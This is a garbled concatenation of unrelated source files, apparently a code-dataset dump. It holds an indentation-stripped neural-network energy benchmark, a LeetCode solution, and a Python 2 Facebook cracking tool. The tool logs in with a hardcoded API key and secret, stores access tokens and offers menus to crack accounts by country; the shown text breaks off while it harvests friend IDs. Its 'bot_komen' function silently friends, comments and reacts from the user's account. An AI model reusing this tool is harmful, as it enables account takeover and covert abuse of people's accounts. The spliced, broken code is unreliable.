padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
#compute output_size
out_depth = (input_depth-1)*stride_depth - 2*padding_depth + kernel_size_depth
out_height = (input_height-1)*stride_height - 2*padding_height + kernel_size_height
out_width = (input_width-1)*stride_width - 2*padding_width + kernel_size_width
output_size = [input_size[0],input_channels,out_depth,out_height,out_width]
else:
#solve for an integer stride_size and padding_size given kernel_size
out_height = output_size[3]
in_height = input_size[3]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "could not find a suitable network layer"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size_height + out_height) / (input_height-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
out_depth = output_size[2]
in_depth = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "could not find a suitable network layer"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size + out_depth) / (in_depth-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
padding_depth = padding_size
stride_depth = stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_depth = kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width]]
elif(layer_id == 12):
pool_type = random.randint(0,1)
if(output_size==None):
return input_size + input_size + [pool_type]
else:
return input_size + output_size + [pool_type]
elif(layer_id == 13):
pool_type = random.randint(0,1)
if(output_size==None):
return input_size + input_size + [pool_type]
else:
return input_size + output_size + [pool_type]
elif(layer_id == 14):
pool_type = random.randint(0,1)
if(output_size==None):
return input_size + input_size + [pool_type]
else:
return input_size + output_size + [pool_type]
elif(layer_id == 15):
num_features = input_size[1]
return input_size + [num_features]
elif(layer_id == 16):
num_features = input_size[1]
return input_size + [num_features]
elif(layer_id == 17):
num_features = input_size[1]
return input_size + [num_features]
elif(layer_id == 18):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 19):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 20):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 21):
return input_size+output_size
elif(layer_id == 22):
activation_type = random.randint(1,4)
length = input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
if(activation_type == 1):
return [input_size[0],length] + [1,0,0,0]
elif(activation_type == 2):
return [input_size[0],length] + [0,1,0,0]
elif(activation_type == 3):
return [input_size[0],length] + [0,0,1,0]
else:
return [input_size[0],length] + [0,0,0,1]
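#The trailing four slots one-hot encode which of the four activation
#variants was drawn (the concrete activation functions behind the ids are
#not spelled out here), e.g. activation_type == 2 -> [0, 1, 0, 0].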
#since add and concat are not real network layers, just return some layer-shaped vector
elif(layer_id == 23):
length = input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
return [input_size[0],length]+[out_channels]
elif(layer_id == 24):
length = input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
return [input_size[0],length]+[add_num]
elif(layer_id in (25,26)):
    probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
    return input_size+[probability]
def get_net_input_size(self):
if(self.dimension == 1):
return [1,1,random.randint(100,10000)]
elif(self.dimension == 2):
pic_edge_length = random.randint(28,224)
if(random.randint(1,100) < 15):
    pic_edge_length = 224
return [1,random.randint(1,3),pic_edge_length,pic_edge_length]
else:
pic_edge_length = random.randint(28,112)
video_frames = random.randint(15,80)
return [1,random.randint(1,3),video_frames,pic_edge_length,pic_edge_length]
def get_layer_output_size(self,params,input_size):
'''
Given a layer's input size, compute that layer's output size.
params:list
input_size:list
return list
'''
def prob_random(self,arr1,arr2):
'''
Draw a random element from arr1 with the probabilities given in arr2.
'''
assert len(arr1) == len(arr2), "Length does not match."
# assert sum(arr2) == 1 , "Total rate is not 1."
sup_list = [len(str(i).split(".")[-1]) for i in arr2]
top = 10 ** max(sup_list)
new_rate = [int(i*top) for i in arr2]
rate_arr = []
for i in range(1,len(new_rate)+1):
rate_arr.append(sum(new_rate[:i]))
rand = random.randint(1,top)
data = None
for i in range(len(rate_arr)):
if rand <= rate_arr[i]:
data = arr1[i]
break
return data
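# Illustrative note (added, not in the original): prob_random([1,2,3],
# [0.2,0.3,0.5]) scales the rates by top=10 to (2,3,5), builds the
# cumulative bounds [2,5,10], draws rand in 1..10 and returns 1, 2 or 3
# with probability 0.2, 0.3 and 0.5 respectively.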
def get_common_divisor(self,a,b):
'''
Get all common divisors of the two numbers.
'''
common_divisor_list = [1]
for i in range(2,min(a,b)+1): # a common divisor can be at most min(a,b)
if(a%i == 0 and b%i == 0):
common_divisor_list.append(i)
return common_divisor_list
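# Illustrative note (added, not in the original): get_common_divisor(12, 18)
# checks 2..12 and returns [1, 2, 3, 6].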
def get_link_vector(self,link_list,target_layer_index):
'''
Build the connection vector for one node.
target_layer_index is the node's array index within layer_id.
'''
link_vector = [0 for i in range(target_layer_index+1)]
for i in range(0,len(link_list)):
if(link_list[i] == -1):
#-1 means this node receives the initial network input
link_vector[target_layer_index] = 1
else:
link_vector[link_list[i]] = 1
return link_vector
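# Illustrative note (added, not in the original): with target_layer_index=3
# and link_list=[-1, 1], the vector is [0, 1, 0, 1] -- index 1 marks the
# incoming layer and the last slot marks that the node also receives the
# initial network input.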
def get_params_length(self,layer_id):
'''
Get the parameter-vector length for each layer type.
'''
get_params_length_dic = {
0:13,
1:19,
2:25,
3:14,
4:20,
5:26,
6:11,
7:17,
8:23,
9:9,
10:14,
11:19,
12:7,
13:9,
14:11,
15:4,
16:5,
17:6,
18:4,
19:5,
20:6,
21:4,
22:6,
23:3,
24:3,
25:5,
26:6,
}
return get_params_length_dic[layer_id]
def get_params_num(self,layer_id,params_list):
'''
Compute the number of trainable parameters in one layer.
'''
# print(layer_id,params_list)
if layer_id == 0:
input_channels,output_channels,kernel_height,kernel_width = params_list[1],params_list[5],params_list[10],params_list[11]
return input_channels*kernel_height*kernel_width*output_channels
elif layer_id == 1:
input_channels,output_channels,kernel_length = params_list[1],params_list[4],params_list[8]
return input_channels*output_channels*kernel_length
elif layer_id == 2:
input_channels,output_channels,kernel_size_depth,kernel_size_height,kernel_size_width = params_list[1],params_list[6],params_list[12],params_list[13],params_list[14]
return input_channels*output_channels*kernel_size_depth*kernel_size_height*kernel_size_width
elif layer_id == 3:
input_channels,output_channels,kernel_height,kernel_width = params_list[1],params_list[5],params_list[10],params_list[11]
return input_channels*kernel_height*kernel_width*output_channels
elif layer_id == 4:
input_channels,output_channels,kernel_length = params_list[1],params_list[4],params_list[8]
return input_channels*output_channels*kernel_length
elif layer_id == 5:
input_channels,output_channels,kernel_size_depth,kernel_size_height,kernel_size_width = params_list[1],params_list[6],params_list[12],params_list[13],params_list[14]
return input_channels*output_channels*kernel_size_depth*kernel_size_height*kernel_size_width
elif layer_id == 21:
    #fully connected layer: one weight per input-output pair plus one bias
    #per output feature
    input_length,output_length = params_list[1],params_list[3]
    return output_length*(input_length+1)
elif layer_id in (15,16,17):
    #the trainable parameters of batch-normalization layers are ignored
    return 0
elif layer_id in (6,7,8,9,10,11,12,13,14,18,19,20,22,23,24,25,26):
    #pooling, dropout, activation, flatten, add and concat layers have
    #no trainable parameters
    return 0
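# Illustrative note (added, not in the original): for a fully connected
# layer mapping 128 features to 10 outputs, get_params_num(21, ...) gives
# 10 * (128 + 1) = 1290, i.e. the weight matrix plus one bias per output.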
def prob_random(arr1,arr2):
'''
Draw a random element from arr1 with the probabilities given in arr2.
'''
assert len(arr1) == len(arr2), "Length does not match."
# assert sum(arr2) == 1 , "Total rate is not 1."
sup_list = [len(str(i).split(".")[-1]) for i in arr2]
top = 10 ** max(sup_list)
new_rate = [int(i*top) for i in arr2]
rate_arr = []
for i in range(1,len(new_rate)+1):
rate_arr.append(sum(new_rate[:i]))
rand = random.randint(1,top)
data = None
for i in range(len(rate_arr)):
if rand <= rate_arr[i]:
data = arr1[i]
break
return data
def make_net_data(a):
while(1):
stream_num = 1
if random.randint(0,100)<23:
block_num = random.randint(4,7)
else:
block_num = random.randint(8,18)
large = 1
# large = random.randint(0,1)
try:
dim = 2
print(stream_num,block_num,large)
vg = VectorGenerator(dimension=dim,block_num=block_num,stream_num=stream_num,large = large)
vg.make_net()
if not validate_NN(vg,dim):
    #invalid architecture: loop back and re-sample everything at the top
    continue
except:
continue
else:
break
def get_energy(return_dict,iLocIndexer,net_input):
try:
monitor = Monitor(0.01)
layer_parameters = iLocIndexer['layer_parameters'].split(',')
layer_parameters = [float(x) if '.' in x else int(x) for x in layer_parameters]
layer_link = iLocIndexer['layer_link'].split(',')
layer_link = [int(x) for x in layer_link]
layer_id = iLocIndexer['layer_id'].split(',')
layer_id = [int(x) for x in layer_id]
NN = NNgenerator(layer_parameters,layer_link,layer_id)
NN.cuda()
dim = int(iLocIndexer['dimension'])
if dim == 1:
x = torch.rand(int(net_input[0]),int(net_input[1]),int(net_input[2]))
elif dim ==2:
x = torch.rand(int(net_input[0]),int(net_input[1]),int(net_input[2]),int(net_input[3]))
elif dim ==3:
x = torch.rand(int(net_input[0]),int(net_input[1]),int(net_input[2]),int(net_input[3]),int(net_input[4]))
b_x = Variable(x).cuda()
torch.cuda.synchronize()
start_time = round(time.time()*1000)
monitor.begin()
forward_num = 10000 # fallback when the 15-second budget is never exceeded
for i in range(0,10000):
    print(i)
    output = NN(b_x)
    if round(time.time()*1000) - start_time > 15 * 1000 and i >= 5:
        forward_num = i
        print('done')
        break
torch.cuda.synchronize()
monitor.stop()
time.sleep(2)
forward_energy = (monitor.forward_energy) / forward_num # mJ
silence_energy = (monitor.silence) / forward_num # mJ
all_energy = (monitor.all_energy) / forward_num # mJ
mean_power = monitor.mean_power
all_time = monitor.all_time
monitor.exit()
except Exception as e:
print(traceback.print_exc())
print(repr(e))
with open(r'energy_%s.txt' % file_name,"a") as file: #append mode so earlier results are preserved
    file.write("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" + "\n")
else:
save_energy(iLocIndexer,forward_energy,silence_energy,all_energy,mean_power,forward_num,all_time)
def save_energy(iLocIndexer,forward_energy,silence_energy,all_energy,mean_power,forward_num,all_time):
str1 = ''
str1 += iLocIndexer['layer_parameters'] + " "
str1 += iLocIndexer['layer_link'] + " "
str1 += iLocIndexer['layer_id'] + " "
str1 += str(iLocIndexer['params_num']) + " "
str1 += str(iLocIndexer['dimension']) + " "
str1 += str(iLocIndexer['block_num']) + " "
str1 += str(iLocIndexer['stream_num']) + " "
str1 += cpu_name + " "
str1 += cpu_MHz + " "
str1 += cache_size + " "
str1 += str(processor_num) + " "
str1 += gpu_name + " "
str1 += str(mean_power) + " "
str1 += str(all_time) + " "
str1 += str(forward_num) + " "
str1 += str(forward_energy) + " "
str1 += str(silence_energy) + " "
str1 += str(all_energy)
# print(str1)
with open(r'energy_%s.txt' % file_name,"a") as file: #append mode so earlier results are preserved
    file.write(str1 + "\n")
import gc
import sys
if __name__ == '__main__':
for i in range(0,100000):
num_processes = 1
p = mp.Process(target=make_net_data, args=(1,))
p.start()
p.join()
# sys.exit(1)
| 42.515815 | 287 | 0.613377 | 16,206 | 122,318 | 4.317845 | 0.037332 | 0.049904 | 0.027953 | 0.019879 | 0.860522 | 0.836985 | 0.804659 | 0.79164 | 0.777835 | 0.765188 | 0 | 0.041373 | 0.280727 | 122,318 | 2,876 | 288 | 42.530598 | 0.753978 | 0.11811 | 0 | 0.699456 | 0 | 0 | 0.005877 | 0 | 0 | 0 | 0 | 0 | 0.010381 | 1 | 0.017301 | false | 0 | 0.012358 | 0 | 0.091943 | 0.004943 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4308b7e60bc1b6e948ac4b2df528bfc55040f7e7 | 1,652 | py | Python | 165-compare-version-numbers.py | daicang/Leetcode | 676b05c1222670f73294eb2ed2665433eac148f4 | [
"MIT"
] | null | null | null | 165-compare-version-numbers.py | daicang/Leetcode | 676b05c1222670f73294eb2ed2665433eac148f4 | [
"MIT"
] | null | null | null | 165-compare-version-numbers.py | daicang/Leetcode | 676b05c1222670f73294eb2ed2665433eac148f4 | [
"MIT"
] | null | null | null |
class Solution:
    def compareVersion(self, version1: str, version2: str) -> int:
        # Compare segment by segment as integers; int() also discards
        # leading zeros such as '01' -> 1. (Concatenating the segments
        # into one number mis-orders multi-digit segments.)
        v1 = [int(x) for x in version1.split('.')]
        v2 = [int(x) for x in version2.split('.')]
        # Pad the shorter version with zero segments so both align.
        if len(v1) > len(v2):
            v2.extend([0]*(len(v1)-len(v2)))
        elif len(v2) > len(v1):
            v1.extend([0]*(len(v2)-len(v1)))
        for a, b in zip(v1, v2):
            if a > b:
                return 1
            if a < b:
                return -1
        return 0
s = Solution()
data = [
['0.1', '0.1.0.0'],
['1.0.1', '1'],
['7.5.2.4', '7.3'],
['1.1', '1.01'],
["19.8.3.17.5.01.0.0.4.0.0.0.0.0.0.0.0.0.0.0.0.0.00.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.000000.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.000000",
"19.8.3.17.5.01.0.0.4.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0000.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.000000"]
]
for d in data:
print(s.compareVersion(*d))
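# Illustrative check (added sketch): segment-wise comparison orders
# multi-digit segments correctly, e.g. 2.1 > 1.10.
assert s.compareVersion('2.1', '1.10') == 1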
| 36.711111 | 323 | 0.458838 | 441 | 1,652 | 1.718821 | 0.104308 | 0.736148 | 1.072559 | 1.403694 | 0.581794 | 0.534301 | 0.534301 | 0.534301 | 0.534301 | 0.534301 | 0 | 0.310317 | 0.237288 | 1,652 | 44 | 324 | 37.545455 | 0.29127 | 0 | 0 | 0.166667 | 0 | 0.055556 | 0.406061 | 0.382424 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0 | 0 | 0.138889 | 0.027778 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
433bbf04ce5cc007c8e4ff964cfeb8b75124a4a1 | 65 | py | Python | app/__root__.py | Peopple-Shopping-App/mockserver | c38c3f325e44f4eaba39cdbe24544e3181307218 | [
"MIT"
] | 1 | 2021-07-23T03:43:19.000Z | 2021-07-23T03:43:19.000Z | app/__root__.py | Peopple-Shopping-App/mockserver | c38c3f325e44f4eaba39cdbe24544e3181307218 | [
"MIT"
] | null | null | null | app/__root__.py | Peopple-Shopping-App/mockserver | c38c3f325e44f4eaba39cdbe24544e3181307218 | [
"MIT"
] | null | null | null | import os
def __path__():
return os.path.dirname(__file__)
| 10.833333 | 36 | 0.707692 | 9 | 65 | 4.222222 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184615 | 65 | 5 | 37 | 13 | 0.716981 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 6 |
4a29aa55d71f55ae3c0de192137f80d2682f80f4 | 57,554 | py | Python | testvip.py | badwordking/Lonte | 6fe2f3f8105c46c5bf494cfd73e35086ea4df874 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | testvip.py | badwordking/Lonte | 6fe2f3f8105c46c5bf494cfd73e35086ea4df874 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | testvip.py | badwordking/Lonte | 6fe2f3f8105c46c5bf494cfd73e35086ea4df874 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | #!/usr/bin/python2
# coding=utf-8
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import bs4
except ImportError:
os.system("pip2 install bs4")
try:
import requests
except ImportError:
os.system("pip2 install requests")
os.system("python2 vip.py")
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user.lower()-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "[!] Exit"
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'%s;'%str(31+j))
x += ''
x = x.replace('!0','')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.06)
#########LOGO#########
logo = """\033[1;90m╔══════════════════════════════════════════╗
\033[1;90m║\033[1;93m █████████ \033[1;91m ████████ INDONESIA \033[1;90m ║
\033[1;90m║\033[1;93m █▄█████▄█ \033[1;97m████████ 2020-2021 \033[1;90m ║
\033[1;90m║\033[1;93m █\033[1;91m▼▼▼▼▼▼▼\033[1;93m█ \033[1;90m ║
\033[1;90m║\033[1;93m██ \033[1;97mHELLO \033[1;93m██ \033[1;92m☠\033[1;95m AU \033[1;93m: \033[1;96mMuhammad Rizky \033[1;90m ║
\033[1;90m║\033[1;93m █\033[1;91m▼▼▼▼▼▼▼\033[1;93m█ \033[1;92m☠\033[1;95m GH \033[1;93m: \033[1;96mGithub.com/RIZKY4/vip \033[1;90m║
\033[1;90m║\033[1;96m █████████ \033[1;92m☠\033[1;95m FB \033[1;93m: \033[1;96mfb.com/Rizky.Rasata \033[1;90m ║
\033[1;90m║\033[1;92m ██ ██ \033[1;90m ║
\033[1;90m╚══════════════════════════════════════════╝"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m[\033[1;93m●\033[1;97m]\033[1;93m Sedang masuk\033[1;97m "+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
oke = []
cpe = []
id = []
username = []
idteman = []
idfromteman = []
gagal = []
reaksi = []
komen = []
vulnot = "Not Vuln"
vuln = "Vuln"
######MASUK######
def masuk():
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;92m01\033[1;97m]\033[1;96m->\033[1;93m Login via email/id fb"
print "\033[1;97m[\033[1;92m02\033[1;97m]\033[1;96m->\033[1;93m Login via token fb "
print "\033[1;97m[\033[1;92m03\033[1;97m]\033[1;96m->\033[1;93m Ambil Token"
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;93m Keluar"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
pilih_masuk()
def pilih_masuk():
msuk = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if msuk =="":
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
pilih_masuk()
elif msuk =="1" or msuk =="01":
login()
elif msuk =="2" or msuk =="02":
tokenz()
elif msuk =="3"or msuk =="03":
Ambil_Token()
elif msuk =="0" or msuk =="00":
keluar()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
pilih_masuk()
#####LOGIN_EMAIL#####
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print "\033[1;97m[\033[1;96m×\033[1;97m] LOGIN AKUN FACEBOOK ANDA \033[1;97m[\033[1;96m×\033[1;97m]"
id = raw_input('[\033[1;95m+\033[1;97m] ID/Email =\033[1;92m ')
pwd = raw_input('\033[1;97m[\033[1;95m?\033[1;97m] Password =\033[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n[!] Tidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;97m[\033[1;92m✓\033[1;97m]\033[1;92m Login Berhasil'
os.system('xdg-open https://m.facebook.com/Rizky.Rasata')
bot_komen()
except requests.exceptions.ConnectionError:
print"\n[!] Tidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;97m[\033[1;93m!\033[1;97m]\033[1;93m Sepertinya akun anda kena checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;97m[\033[1;91m!\033[1;97m]\033[1;91m Password/Email salah")
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
#####LOGIN_TOKENZ#####
def tokenz():
os.system('clear')
print logo
toket = raw_input("\033[1;97m[\033[1;95m?\033[1;97m] \033[1;93mToken : \033[1;92m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
print '\033[1;97m[\033[1;92m✓\033[1;97m]\033[1;92m Login Berhasil'
os.system('xdg-open https://m.facebook.com/Rizky.Rasata')
bot_komen()
except KeyError:
print "\033[1;97m[\033[1;91m!\033[1;97m] \033[1;91mToken salah !"
time.sleep(1.7)
masuk()
######BOT KOMEN#######
def bot_komen():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
una = ('10001n3185071041')
kom = ('Gw Pake Sc Lu Bang 😘')
reac = ('ANGRY')
post = ('9377n77953338365')
post2 = ('938n954086554085')
kom2 = ('Mantap Bang 😁')
reac2 = ('LOVE')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=' +una+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post+'/comments/?message=' +kom+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post+'/reactions?type=' +reac+ '&access_token='+ toket)
requests.post('https://graph.facebook.com/'+post2+'/comments/?message=' +kom2+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post2+'/reactions?type=' +reac2+ '&access_token='+ toket)
menu()
######AMBIL_TOKEN######
def Ambil_Token():
os.system("clear")
print logo
jalan("\033[1;92mInstall...")
os.system ("cd ... && npm install")
jalan ("\033[1;96mMulai...")
os.system ("cd ... && npm start")
raw_input("\n[ Kembali ]")
masuk()
######MENU#######
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
os.system('rm -rf login.txt')
masuk()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
except requests.exceptions.ConnectionError:
print"[!] Tidak ada koneksi"
keluar()
os.system("clear")
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;92m✓\033[1;97m]\033[1;93m NAMA\033[1;91m =>\033[1;92m "+nama
print "\033[1;97m[\033[1;92m•\033[1;97m]\033[1;93m ID\033[1;91m =>\033[1;92m "+id
print "\033[1;97m[\033[1;92m+\033[1;97m]\033[1;93m TTL\033[1;91m =>\033[1;92m "+ a['birthday']
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;92m01\033[1;97m]\033[1;96m->\033[1;97m Crack Id Indonesia"
print "\033[1;97m[\033[1;92m02\033[1;97m]\033[1;96m->\033[1;97m Crack Id Bangladesh/Pakistan"
print "\033[1;97m[\033[1;92m03\033[1;97m]\033[1;96m->\033[1;97m Crack Id Semua Negara (Buat Sandi)"
print "\033[1;97m[\033[1;92m04\033[1;97m]\033[1;96m->\033[1;97m Ambil Id"
print "\033[1;97m[\033[1;92m05\033[1;97m]\033[1;96m->\033[1;97m Yahoo Clone"
print "\033[1;97m[\033[1;92m06\033[1;97m]\033[1;96m->\033[1;97m Profile Guard"
print "\033[1;97m[\033[1;92m07\033[1;97m]\033[1;96m->\033[1;97m Ikuti Saya Di Facebook"
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Logout"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
pilih()
######PILIH######
def pilih():
unikers = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if unikers =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih()
elif unikers =="1" or unikers =="01":
indo()
elif unikers =="2" or unikers =="02":
bangla()
elif unikers =="3" or unikers =="03":
sandi()
elif unikers =="4" or unikers =="04":
dump()
elif unikers =="5" or unikers =="05":
menu_yahoo()
elif unikers =="6" or unikers =="06":
guard()
elif unikers =="7" or unikers =="07":
saya()
elif unikers =="0" or unikers =="00":
os.system('clear')
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih()
########## CRACK INDONESIA #######
def indo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;93m01\033[1;97m]\033[1;96m->\033[1;97m Crack dari daftar teman"
print "\033[1;97m[\033[1;93m02\033[1;97m]\033[1;96m->\033[1;97m Crack dari id publik/teman"
print "\033[1;97m[\033[1;93m03\033[1;97m]\033[1;96m->\033[1;97m Crack dari file"
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Kembali"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
pilih_indo()
#### PILIH INDO ####
def pilih_indo():
teak = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if teak =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_indo()
elif teak =="1" or teak =="01":
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak =="2" or teak =="02":
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
